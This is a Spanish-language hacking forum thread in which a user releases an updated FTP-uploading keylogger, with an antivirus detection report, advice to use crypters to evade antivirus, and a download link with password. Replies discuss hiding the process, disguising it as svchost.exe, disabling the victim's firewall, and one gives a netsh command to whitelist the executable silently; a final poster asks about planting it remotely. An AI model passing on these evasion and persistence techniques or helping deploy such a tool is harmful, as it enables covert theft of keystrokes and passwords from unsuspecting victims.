Bueno a lo dicho hecho y me puse a corregir varios Bugs al servidor y cliente... el funcionamiento del server es mas estable ademas de no aparecer en el administrador de tareas de la PC como en la anterior version...

Si encuentran algun fallo o errores en su funcionamiento comuniquemelo y los tratare de solucionar lo antes posible.

Imagen

Su servidor actualmente esta asi aunque no le hice ningun proceso para saltar AVs, sigo recomendando la utilizacion de Crypters...

File Info

Report generated: 16.4.2009 at 20.36.12 (GMT 1)
Filename: Server.exe
File size: 40 KB
MD5 Hash:
SHA1 Hash:
Packer detected: Microsoft Visual Basic 5.0 / 6.0 [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 3 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - TR/ATRAPS.Gen
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Gen:Trojan.Heur.VB.2015EADADA
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Win32/Genetik
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
[Enlace externo eliminado para invitados]

Descarga:
[Enlace externo eliminado para invitados]
Pass: 4n0nym0us
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
Muy bueno 4n0nyma, una pregunta, al conectar al host es para ver los logs desde el cliente? es que no lo pude probar

Saludos!
Exacto... puedes abrir directamente desde el programa introduciendo los datos en la parte cliente y saltará automaticamente el navegador predeterminado y podras leerlos desde hay, o bien puedes descargarlos y abrir los DAT en PC local para leerlos desde la pantalla habilitada abajo

Saludos nena
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
Una vez mas gracias por tu gran trabajo 4n0nym0us

Yo no uso las herramientas que se postean ( solo las modifico xD ) Pero se agradecer

el trabajo de los demas ;)

Salu2!!!
Imagen
Descargando ..!! tiene muy buena pinta ,

Gracias anonym0us 1 vez mas por tu trabajo !

Saludos !!
Ok thnx for information! try to correct!
Se ve bien, pero cuando ejecuté el server me saltó que el firewall estaba desactivado, y cuando lo rehabilité saltó un Overflow error de VB.
¿Es necesario desactivarlo?
Hay posibilidad de hacer que el server en vez de meterse en temp\svchost.exe se meta en %windir%\svchost?
Hay posibilidad de hacer que el server loggee teclas y nada más? (Es decir que no intente conectarse a un FTP)

Saludos.
Lo del firewall lo hago para no tener problemas con la conexión ya que no lleva inyección.
Estoy trabajando ahora mismo con rutas he intentando ocultar el proceso del administrador... me esta dando guerra.
Esto es un Keylogger para FTP... aunque tambien había pensado poner la funcion de Keylogger local.

Ya se harán los progresos denme tiempo
Para no desactivar el firewall, buscá el equivalente a la siguiente línea de comandos:
netsh firewall add allowedprogram program = "rutaynombredelexe" name = "Nombre que queremos que figure en la lista de excepciones del Firewall de Windows" profile = all
Eso agrega tu exe y lo pone automáticamente en la lista de excepciones.
Ansioso esperaré el server que traiga opción para logging local

Saludos y suerte!
pregunta a lo mejor tonta se lo puedo subir algun remoto ? y igual me los sube al ftp xD soy nulo con os keyloguer nunk los e usado :) espero me saquen de la duda

Código: Seleccionar todo

frases El dinero no es nada, pero mucho dinero, eso ya es otra cosa.
Responder

Volver a “Troyanos y Herramientas”